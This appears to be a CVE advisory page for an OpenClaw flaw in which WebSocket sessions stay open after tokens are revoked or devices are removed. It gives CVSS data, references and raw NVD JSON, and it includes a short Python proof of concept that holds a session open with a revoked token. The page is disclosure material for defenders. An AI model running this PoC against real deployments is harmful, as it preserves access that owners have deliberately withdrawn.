CVE-2026-34503

Description

OpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.3.28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import websocket
import time

# This PoC demonstrates that a WebSocket connection remains active
# even after the token has been revoked on the server side.

def test_websocket_persistence():
    # Target URL (example)
    url = "wss://openclaw.example.com/ws"
    # Use a token that is about to be revoked or has been revoked
    headers = {
        "Authorization": "Bearer REVOKED_TOKEN_HERE"
    }
    
    print("[+] Attempting to establish WebSocket connection...")
    ws = websocket.create_connection(url, header=headers)
    
    print("[+] Connection established.")
    
    try:
        while True:
            # Simulate sending data over the revoked session
            ws.send("ping")
            result = ws.recv()
            print(f"[+] Server response: {result}")
            print("[+] Session still active despite token revocation.")
            time.sleep(5)
    except KeyboardInterrupt:
        ws.close()
        print("[!] Connection closed by user.")

if __name__ == "__main__":
    test_websocket_persistence()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34503
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34503
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34503/
[4] VulDB https://vuldb.com/cve/CVE-2026-34503
[5] https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv
[7] https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34503", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:19.470", "lastModified": "2026-04-02T12:21:24.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.28", "matchCriteriaId": "16831C6C-CC20-4318-8F7C-9FCFB12A223F"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}